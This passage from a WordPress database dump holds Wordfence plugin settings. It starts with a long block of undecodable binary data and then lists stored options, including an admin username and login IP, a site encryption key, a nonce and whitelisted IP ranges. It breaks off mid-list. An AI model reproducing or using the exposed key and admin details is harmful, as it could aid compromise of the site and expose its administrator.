wZ5-Dڼ@JS\\<Cޏ=s\'WI&\Z(vaToO,\ry\"ƺHoSvP	SKwcpU%(lfU}hp2+nDʭֆvBǑdX 1fvHy)l֚ă3͒\rΝĹTN3_*.֞&ur|i+Q`ŸM1U֠)8l/ZR=YpO2Iu>&˷uUĖ{kdo\\o~(y&jF%@I(.#5U[֋DB@i~1\'7Ö\0W2jʙ{`01]!֥\nc3*aVֆeƗԟ9ROt\rC_4czSsTAqcڷ59aO҄?tM)PHٹkώ%7f+$.~ӛMxkv\rns]%́Tĉҩ^{Ǝuj-{V=O\\j??f&:s[#RDs;ʅilbX.-t/ykOՇ|{W9mdJNRj8?|H!sђi{OT6{z480og3xFR.:+װ&䄇2C.aeE0,9\'ZS54G[\\e}*<|L;zxx?&WFf=x;Ҹ.uL)Ԝ2dL{035Y!U\nhq\\DGhB,;b&<C$H\n>TEGN`-*(q#ԜD]KXJnpiήo(F rr^$O5M&JDK0FNw0\\Ps-\"d,世n7z:nSKn؎\\X)Ш®4ʸcWþ#E5ӂe%/h]޲#ш9`vb9N/lRagLwԺQ\'b(c/:+~Z|\0u%rvBT iނNɫ/=1IDj0\\lM51(R;\\gՌe՞$_,j薶tC@ϊ&8Haq_/BuZ&?y=ӡC6d6m\\]vayT*fZ/8߬U(WU{-V͗8$4l\\L4y\rotf`8^`=@lTzŜ8)}~H}qٗNai9U᤻\Z{٘\"[,T#H5\0F	\rRosٙ$ѰRej`^7葟%yٜM9\Z/\' ٞ4bVttkEp%~D`%\0;ٴ M\nWX\n躨||3ߜ++4,ٷ紱1]ֲlzbVPx̜=ŭ?/Č)-\'Lԗ x!Uw_nFa>e3;vztPi(d|\ZVw7BAzzMk+O5@&},pyF(%Ld\r*n=YNt,kL]*]>N5c	Ynl)\"qqpuu4F݆$ӕ_p~*60#?BTP|:X\Z@d\nf!B>j\\R^3VcZ=.\0܈\\\',(&M1^t&*/:7`P\nS!:b=.#R[$V<Z>f+mսRh_i;1zm6@d35(G\\ܧDoi	Pp*vw;X?=s|VFƢIdE<8mJ.Ewj#_\ZܞfnN7U//g#JKӒ]堹|MnYM\n}2 `Qv_\rzB^=څc:ܾ|@l\'e߲~چL-u5Zkw=03O* ;XJ\'z0ګŲT\"\\S@ޥ+0yrx9M,ڮ(\"Y<%I 0c+	Mv1ںQG䃞uGiԯg#dN,֢_5^W{KbFyPXp^Mƴs>\ZH.\rߏZ\\UDOtޔ&ŔLZO\Z4vdU==cx\\魞5\'ҵdջ`k_[aJ{p\ZE=(X\\s	pJTX~\\sAk\Z-=}Fb᜾TEw!}a}.& c-B\'Sj?t6SzåZ,jۂwT\\ +=ាb\'^xK.ۑ&\Z錷ې7~rbۣ԰<К~_m?##B	(ۥ~b%w\0 z9wsn>Dy1ۧ#)\"UGܑ]ۭM:EZ<v(@^eK\0۳}sYDk6M(kGNة\\B·Tj5D-8FQ\r%.m5R㖩\r;gPklr<CD0*\n)mx:.owpԴ6b@WFk-1q[42\Z@r: ӪNlTD,\';=%~	H``@}6[d=w\\+y%e-_+^J6^NihOJkfiBD̉I~.lvPgwv\r\"aMI\\P;b>꧒5>7Dublg=z^z)t?Ū鳊<)+$>S 4h\"hAD\'\'|6[kF=\nyifmR̗Ui؜!YhLa门b|\r,7@\\\'>0n+SK&sщ\\;Yq9wm3t	ЫQv#`i-1ٞUhܑǣg\n4 ]D$WܗEV8֋i;fe|ˤܝ.rYMDMKqĹzZpܣxL#!E~p#wp1[0L\nܱfXI`&:=^bKG\0.ܴ&#kpe`򷪱hfsIXNk:K:\"$_\ZgpSI{ǫ2jPfGi+YHK׀&f8Hk[%mrs+n0Of֠7yg\0x-8EmbE\rH	Zm\"6N`! B\'wCˮ.0{\'~K.sJIPګ&nR	2JX}k;\n5Vr4݊w?L)Kf4ٺ\ra~tnTݩzKuY.mi4*UTݴ\"cYO|D\0;.Ѵ*Nݿp\\/h#]\"\n=/MZփI33unM5Kh&bV\\%Z$iC1~s\\6rۘ\nΣ6tt|hfS?f_z`y(H2\nyπ8FpBkʫ.E\"y3(ɝO6Su՛Z&S,	p\nb!s!ͮ]>\nOj5RLCIeỔJe\0.SF>.wg:$\Z	V8{V9/jzbbhF+\0~XtǞC{%f\"Z_m=Z>D[{/m9qN9wN|\n֥sj*bTO5pp`)ޖp1iМ&19ޠ}D3̲ޚ$>*~wa\rxޥ\\}9QZ\rHO\Z+C3\r͇q,ޱ\n1$d8v^!*3#͜v@3&hN;yB\ZN 8	jxoXQl~?8ii8|LeI_y:&Rz<OT%x\Z܂it11EgU&21YI\nf	YᦊFrL7uSt֗pǯ$U-m ~V>򘀹EY\r,iՂ!\r2nD9T%T֖\r>ƾAY{,P\0~b\"܃n\0A=R<F{;xپ۶Ix3\nzǖ۝Qh-n&Ue\\Xj`nُ|&k2ʰS|I߆Ryrv@|z%Ӷp,ro;B5\0CyaFvVNcۊiBaTfX|jbdPCW>b$=Otǐ>G8jj48-sZԏsŝf?߅yRz5T\0DU磣	w̯ߌ\nrsgɴ5Z}̼ߌPܻ\0{QЩ#m,x\\`ar_ߔ}>&Iy	pby18gJ\nߠB.qf6*_-WI4K2ߧ)sg,He|\"j̋2(߹VNA=X\".\nŅi2~<gqԴTϗ~%>ԍ6m_5};[IFi|x7N*TZj\ru^kbڵ)P\0[\'.l7^\r?%RcIglQRx\ZˮR-SZo3ҳCAj	M^2ɖ<tfp\'P6߱)u@SCom94]2IeEkqh@N>އ͘RRSo sByc!l	MJh^`7Z=^ԯč1TgرDwhlԑ_x4\r[	\r+~\"j\\粃h_EV\"R҆c}oiӿFp&KIPʽD[E=3iJ[ax(aBtgP	B\"(QG<C<F\Zm_=|kBô4>]Ffw\'欚Evm8aĆJHڢ#eR7\"d#!E!,cl5B\\	W\"gܷ}}|CC0v0K\r-p4,KY(I xDQ/tvǹU8-4J\0)Sִ?k\"4Z.Z9\rkXe_^q(ѵ/̹h22&Xt-aZnmsNQ\"?mFN8?pi\ZhHz᎞O,khiYe8;w*Aފ&\'D:5`v>dk}<6 ȀKB۵&|UB\0Y;@7GJ۽揷+I-i3<e\n!d>a%+eT7 ҧgяd,w=	{|\ZZoϢ.p]U\ZeOlP&A{5/w?Z)H%K-xrNpꔨ%$,5%m,\nu(ޞw0KoHJ,a	rU9\'s?|R0AtRWE )օuTRYT6r\ZIZ)[w[]=`LÞV GLmJafo\0We2`:Z?^X=Gγb<HGwE21wha3(J@‵`iz y}fWmhGmM]H\ru:4̩i7[G쳙r/a4v)w}U+谆{3⥾ϵ瑉N)]W1+Z*ʠu<e\n,&ͭ1:If	ڦ%5@Q85ʂ1-5ymn*$\\lG*EM\nl׭m[-B8YٺdJ6S.V594*fH	r*\0Y㱿;+h<RV_u&R:ƹW\rbCJ9nFB yJ/adVBZLC;wxY^&^=xʆEs-y@Gy\Z}q-сo/@87?!c^H\0E*Iz3^MP4FlwRCH1\0H\rgf^Hq*v6Mg2IYg_,\ZI.&;ӾrV<SgU|4E+5C828ҝo\'?_8ۗ0]$47F\ZA#[RAr57{07f=9GcNyΟor|A\ZU\0jJΆPM6.\n?~oΥTXJ)*aL#Vŷ42B2,uʕn}~҂Z-36	>ӯ\Zz?<^޺%8\"yٱOlB=VGh!K<Jq;(5nOjnYZ5qPܠ4zgzBtWnW&c\'J@{Trq	*kJ+0}VLf6	ӆ`lI*H?6G}hoB %L@ĥbu(FHP\\ȯC9!cnN*NJg}Yv7Oh%.\"AX*䯂:roO\'7x9)yj?wk6(.Tv̯15Nb7ٳUw*)h	+ڞ\n)QNkU4JM\\V^1urYޥ1mwt&Cr\'BMFu\Zx/D9zH&U>+TKF(,`:7QǱ-FZQTƷn\r{Puυ~\r|FSa(J}ȟA\r1Pxzuѷ;gtS7Gn+Q1rgQ yg5.hfhm;k W8ˉntAbyMϐ;(uj?]$C&eZ%,zfw#nؔ50D*/rxPgb =#\0M)B\\eCAwwKHY\"0d~k:\nYïy.5 <ooP?DO%ڵN:({ZӌUJk#HT]^U\0Tją[ƷGֱ!IzA4N:ӊU	[y-)5_Ba\rc;pvgm-,_\"TP].힭j8\\3c\Z^@i# UcjHq.!۴	^U\rs&z\\LKcu[;m幡F}I-6n$[$\n92%V0D2`qT&%q5y\nVڌHt:<k% (1.pIueIt9]\05^\Z!cxNdiGeAI@\'iۤz*bTJ-2<8Ko|nF&Q It-Z\r˅HF wb9ѿ\ZxRcI0{eQD {~aK\\-B\Z](5z!UN[a9{jB0PoUKjaWś\'yY曗>@-=	g_{-SP+fQp87i!*I6Kk	oyAw)}\\C	\n=Չ{o׶gbUh6XE.Run5jO\06\ntu=5Q%Ǜ|߂YM\\JabTjbGarU~\ZoZ\"Tɷ\rM +	`gOl:l}s1iJoZ3w/at?\\piEE,8)Tn,qSFzȲMRW3\\\rq1?XEGDfLSq`	ٷ炿E$>96g\0È];l\0l*\r\n%E\'tF䝆煶\Zf=?;[%j{jMa7痰fWeJSZwkXڱӍ~\n}@=\\YYC]Ǣ5cZ\rlYq\n\")\nSe]~&^vwŜv|چ`z`I{zC9]W9Ջʸoz=pr7\0H\n({S=gkyo?8Շ|BD137ţ遢\n<Yz\'jX`frQ\Zȿ4MF/-fr:CK\n8]PY5Hgb:<xݢX,s\Zi(6貿!gъk8&\\-38岟kn ϣ-dxj)dmx́߻?9ݱ|X!l%1+w$5Jck!ԛHFfK\ZR$HZY\n~P.x꜃ Nî(gFw@Ya_^f^(\rO>踭,\\qr*Llf<w;?ݚd t-8e0W~*>< *0V\04~tUgLQ磺1Zktx*5I鄳~㾥ݐnn\'-҉V>鈢ڛr],?i(R;}>QV!yvpc̒P`-e9rJK\'t>;髥ħgZCJo*^ɰ1NJRiBOӬBVhpC%Z}=s<۔[Z#g *\Z;1\ZE?Ic_c#ňM-[\"nE*9p:cZT\\:_&#`Q\n.	.E@ю.%Eg=N3>g|S(FjǕ\n;eX4PievWsoڋLQBWbexAj,prkjVi]A\"3#q Ɔ\Z)+l\0#<9\"ϕAvhzJ>AqW&zUV\nW8 `\0ayxHõנcΏͿͰ9O8^^]t*f%YE5<`Whj0g_MTJ\npc[_:E(.)&$*~(gf;c\0̢ce:Hb>R@\'=v@5)y&֫\r;&؛ƿػ5|V{׾A\rreAFzK`\"?EzcRz͞.V~!6k8W\'|ǘrfH	/A.ya餷#c^SA_7\'hcv]#\':zKl?Yk2W>-MPN`g?\\\n\rK\0J<ǘ3bxT:W*r-6fpxc,hoNI[\\`nB7$·#t\"Sm-C`ɊsE#)(A[h\'|kaOIh9A\08(?K\n͠ZNtaZf+Ǡ\nKbLDL94ݬJ݃ClE<aǈl.ēz]\n\Z:zs\0nĽ>e[7NJtt@`2Z\'SV\"*XAvkOxޡmdFFÅfa+6)rb4ʲg}SxvֻaʩD\05SS-*^Ӆ\\w%`0vl\r\n?4ɿr֍On_4`/-\'aYI|6`Z4\n\"l\'U8ykSlصA(GL8!<zKriImVe(iCx/?OEqi7A:3\r:?2=,+)̻ng3(Da!_y	QVGK҂sv@N\0}AvA$=08Qj`\Z98Ra>rZ!e%duH/l+ޠ.I6(웎yRj\nMx\r.s΂&쮝yY#ǳE	92vnjs,_Y{\Zk]ٛzJ^z{M9l+:A}00.@L3l囔\\HiܵxfLl#@Ťe+׹=So\nhѱً!J~ẞǡɹὙg\ryuCx;P{kyM#h.?t#ɠ\"z)`RI+_#ap[o|\':@A} E饬2,)w_DʉԶ͂6j40FSc\"~G8<\':M6/U9)OWT>S0\0;QO%$K	\'͕{)_ĝ#/q&O[O\"²,l?2j&,k$t3?iYϲYڷO5]I{ٚXLl#,\nWMbXzp)\'F{Pniq9o̳l5y9Mb&iKues<%qѬ6IF_\'Q73#5XNxL+֖}	gTj,)0f;7p>Dy(-s\'#֛XމΆ>풏9Fܐ𱐠dְH]@ePayŝ&)ԧ0x)/mۅrUz&[j}wREv{AG5Fi	y*dq]OX=>j*욬e3p]L}``DX1عWJ]cƈf	uJ0fj\0ցsZR~]*\"rdS2!{֣:=Nzg&$F,lK급/Í9zÜu\Z\"dm*\ZX͹[I|4r_xS*t^&/\\$r\\`ʳa7%eűCS6ǀh2.^Ww_NCnd,ypU~2ʩw:jU/t#L\"utPw\"Lx|(.ayѫu#\ZڄeuuI;o,1{[rѸ5b,B2+YGHQMp+i2vCm*iQLCH8RvJjo޼f2RFt	{[Ob4?fs^Y\0^%mp2X[j_aGv@2b\\\0~*JjT\Zw?/cg)eZ~&qN7 Z-r$E\Z3b\nNyoHNmQvaN/	Y!v46]3]3<ڗ<*=t󅡢pEKL[Mrx%\0b0qqĂ|x:_V5:USo2ҾPuA_*}~\'K9;4p\n+=UO}6Ԋ|}<yﭼ։Khxޫ(R1=~PwºT+In\r{M_໘`3x4L#\\rԹF \"$qc@\nCKnAO] `oCK.U8uiH<pShZذ/\r.O}9fPko2,=A}P#\r5k,PD+>J5딧n.\0URqk\'i_i,\nG+L.\rQ\0%\'ym_#?E1\0² 75mw>Z2Q2K=^NqQ\nIS}V#N7=ɷ5gD>h]3\n0_эWg1*VFIPxfvL@pR;KR[:[*w(1 yjL3ˇd\'V&}l]dOgV:5fHA~l!/6yԶ![^IٷO3E}{Yz#@XaͰ]()ck!~s~hq0X?8̅Hi,+x͵SE9r=#_~\\/Sͻ(YC/#/D^>6\\V6 Ei*X,/6}%]v	\ZY<}]8c4=}Xj(	;wgָ,\\R0$koA{2#am\'Y#O(&\r\n0{z7jRv^0?2Dh4SG8RHe4ډ3z\ZrK,IޗOexџi}.kQ_39y\nb-5c,R3\'r.]9cxߚY9\\~fǶhj}upIXpھΩT/6FkTE;H	#ߛ{C\'Vۨ/H_n{FW?^ծV N	-js\Zjh߽CșIEbUa9e׽RX?楐1ih\ZҕXT9Eߎiц	v&=GVkr2C5m~q~;rfXᅸeXtŪ.+[咩H{v./s|UZAh$DUsI{\'\01rkDac#kQbm(({ia^\\vJMC`QA6_~jc,1F\n)7䩾!@	nK^$NVjq`JBZޅJX0u9>!v1vą>Ш&D6X]`=(fy2Э9exkzB46Hy/=u4_c	ο\'M|4gE;+\\)Hq{@dX{a2H=G6Cm:|!%p8Ug𿌫ANyqoʅ#&]#mVەrȹL=6mzQhZC TαiߠPom\\D5~!ЗeW_6|T->{rC\n=kRdj6T\'3H_cxNpnx{V@f!D.SJ/xknZ~q6Lꂨ$?{II%&V(Aw<䩻c$a=!3CPY.c%0b?O)Mퟴ[%>xd]?Z񴝞15q)9W/`kWV*_i_\'hMaCQW~K0X~D<>5O!	U\'IaӴ9+6fF7r,?OP\Zr(gau;YR>v\\?sk\\ ~mV|ݐ\0!ٖX6av/%1UEd_w\'ޢKGs*<vu.SA`\n	tp\'\\ˑ+&*u4c	\Z{\r@l(2u-VJˀzا`*#jxZ&\Z{C\rB]Y#<\0!_M~(k_MWFi]iˍBl@j!\0@Ų3pv`r9H(cWޏK\"$Gϭ\'6I\"Vɜ=0\Zh݆֭<e1L!ӳ\ZDKi@*SĘRg	rz2,oQϕFUlt*gV☲ù۬BjLNhZe%D\'G}wEk*	W،j|K\'lȈ<fdUƬ\\fHvIIwd4\"醗0_h^1-cjHtfݬ?D)\'hcF,4|iQlpt>%y1PbBR[B}\n[;	I2qU>n)̈́IxVV$Z=qUOc\n4\r\'R28F(>F2 \"Qj6h\'Vh~Ad7DcA\ZHzyIQ]o%<DNNM^^/jC9tbp\r<!!dep\Z	0mz%\ZN:J0L2\"L⯜t%>:1WRͩQi~^Gvr`G̃S$ 2|>YwMW[ I/H-j\r%D+P4g.{^W/![quT &gɖ\r.:)Q7ݣ h\"bY(VW|/5[rɷ*MlrnzWm:fO&y(H\n#_FD:1I}U\"\0HB&`8m!Uc%rT.qx=\0\"I8c_;k6RrE?{dG_A7c0+^Eh1{9U,%k1X\r LcN;<K{*kLE,t*J.	*歁\\5c%aPTgxȻ=|@ ԃ\\HVq2v5o,\07IѴE90.BAe4>]ySPk=9ifCu	l6E#Zt,#<\ZL4ZZ<&^SV?RÊ]	ͮ6RԤz8\\4wcysM)9@2.V/Bc5a\rRIG>?y;+\'SAED>qqa_؈K)A/YQ;#6ycȌʗjL2-[ 3]S.\\0הB/\njz\'aFL\ZH-L	`$p1/>:rVǙ=={OrRxgJ9G0>zc&IÆb4~*LQRkg!ifnb.*η$gwT#;?`?;\"AY|X;uaw?oabN$gI+R.e\Zptᣈ:\Z`\'8y`wW0PRƇ]Pd$*H9\n?g{gs	gOXI#n!F#Yȼv\"|:ݯCG#\nYE[Vwi%-%F\0[n1Sa+]BE2sŎ)?ԟB	*ZOےn+z`ߗ]^$dgGfmG8@~n?	x*ՑxkS략9URݼ\"EI {`z$쨀qZ6hֲCR=8Hΐ<>yy= ؃Gө&0*u\0u\r+M\nMƿ4f_MG%2q0/ғ:;eWGʈP,KA]H%AQD۞V蚹xRBBy%hWvǶm}nG. Ճg?rТjs$_D&֗H᝭s%vx-#?	T5)\\Np[>&]:.ѥׇ4UhnlhʫjF**\ZWnfrP#3w֢$¡桘3D\\[IwD=O$l\ZI9<0ox>L1\Z?f]t2Ј5IvC(߱wziC\038\'U$S(]4PcUv᢭(c̈́ɯTνڐ$_SЊ||nD~v-;&W0;7\"L~ޅLE`!)lʛhLO/̩3z4ΚC:Ufz^^Gn/pR1C̬202J΍<:_B!s*l6\"Q_ȹ2a7<\\U}\"As?C9`r0É\01yiN7,N]8ϪC,01Sͭ-abpYx{VcolNGqlkbañԟyb@Y(J5}׸dt`MuƂUz[w\\=ʼ\0[\nKix-b>,EdҔ\nN-\09pM0+~0:6r½c	h{M\\J,k\r?O\Z/ކf?xȃ9\rQP@\r\ZSz\nEOwF.P)n><WS)_]Ya\'kY_otr)CEIm/;ggŭƱ0`8^\\Ƌ~~J7$kSsYme(|.ŹzZ[몾lc읋qoןK֛+%؂!a29\n`F_h*y.ZۭP0\"j=xat\\Kh9wǏ;Z)K~Q[::js^Z@2nve)e_u!9]we<΁iJkNBSThZs*[?	POvDŌi*b*;ةDڨn/Nshwk1]\':&etbt*\n\'Z%$^*BR_~;Ak8\\=>J1~(Acqo%TFO-GzJTN>\'#.D=a:\'jK WHS`\ry~E~|\nRi)fl饔e})ld*ÀIF^ȯܒW@~ݘT`l 9睪PkKVd*bzHpf?@јݲIG]qM;>l\nA>khR8yOtldU^E%On޹~}J[An>P:74iwqcs @\"/š|sP|0ô!J[h7e^JTuVڅ6bJR#ԲYunnOc\nizNy׊}˜.\Z^\nx+U1wz)\"4+B\\II%%\"ЖX~X4;;]*	&\"TQWvRid3m`a3\r45q$&Β9QO*zkBjdE,TgOrP~tgng(W{v^Z}ȐC6ݞ+?۸ZPd?P\\kO}H\"F+:̵LZKAxr^/\'D~4d`8`qr|\Zゐ5bT2ph=j#jR	𪏨|z03ܸOV1SlfwV1	l?.\rƨ;p-e*`[p5Uͳ{n!z[>ft4s^tE+WLկCҩχHhZ;P.s.1q+܋\r4$PduU18<KnspGRb:L0j}y슟WSh5GH;V((\ZB\0\rlŗBs#3?+WpPMk]<px_\"RLkiGGPP(ϞS3Q?(H|,;pH@yƄk}{[W{LG.vOǫ\"M\r6IcE,M+,ǖf MP[Y&\r,YDxxVތ\Z~VDZ6aW_tʩkgi\nB_[\074w5qy1Щ3&Ttȹ8=SPyYmmUIOF	!qO~þ`Ϸ7i.KK;3@\"_d/5%9U6>NcVMTpW \r0Z|\\T-BD\",Quܳn.A\ZXm,P\rJhxQ#\0tgFNv&W\"Ĳ}:kS-e&sc1hؗ]m3ĺXqÏj_y[+xEV0zxi\nF\n74欋\\M=OhL;-F\0U*/d.>z_MEMՏ-/v_څc?,U&\"R[R|L<uQRVxs	b[yiC\0Tq@W~{ṜgIU9\0ڡSwq\\(LpR^_mo<e{FEP\n-,5H:@\r%-,$yk\\3딢ߓ{B2AG<&%߼w$cTV¶\r|f7hCp\Z8wG+dUxXcѨV*6i(HXw6[|JaʹЖq^Oh;xA3-\rhM>kv7[ׇd̂zR<2K7II!1&j[656i8ntl*?/]\Z4tX*52.p·\"F6Zؙ\n$zz\r9`\\&S9~{-LKŝITi;u!7UeH> -%G(m\0DO;^Klظ!/?aFz#U%f{xi<f;KZ9ްNWj_H]͚VIR[냛BwsbN}qY7zoUu\'1k~P,oʂ-~Bʾi>1/##yXoa\\DŞhebh?)31us_sШd>V*R/\0ӷ~r%\"8lbκ\"7eE=n~͙\'2C/?	CQc2 Gehh݌^@˶\\},nۛ~AF,{<nн>!2_Ud~p7O\";}rP\0','no'),('originalScheduledScanStart','1592722200','yes'),('totalLoginHits','233','yes'),('totalLogins','103','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:6:\"ashmin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:29:\"Fri 30th October @ 01:17:20PM\";s:2:\"IP\";s:13:\"47.203.137.20\";}','yes'),('totalAlertsSent','105','yes'),('lastEmailHash','1604081840:3b46fca0b925530d8af0af5892c86515','yes'),('autoUpdateChoice','1','yes'),('adminNoticeQueue','a:0:{}','yes'),('serverDNS','1605459663;599;45.9.148.154','yes'),('liveTraf_maxAge','30','yes'),('signatureUpdateTime','1592945314','yes'),('adminUserList','a:4:{i:1;i:1;i:2;i:1;i:3;i:1;i:4;i:1;}','yes'),('useNoc3Secure','1','yes'),('lastAttackDataSendTime','1592937840.924145','yes'),('touppPromptNeeded','1','yes'),('touppBypassNextCheck','0','yes'),('autoUpdateAttempts','0','yes'),('longEncKey','73584b1e4748ecb94b651bd3e82a3ea08e696943ccbc07de9896a5cfff81979e','yes'),('dbVersion','10.2.32-MariaDB-log','yes'),('allowMySQLi','1','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"ff01f2e6664f6453fe16fb97baf23144cb53b41b51b0e5a0b169de2358e5f29b\";}','no'),('blockCustomText','','yes'),('whitelistedServices','{}','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880: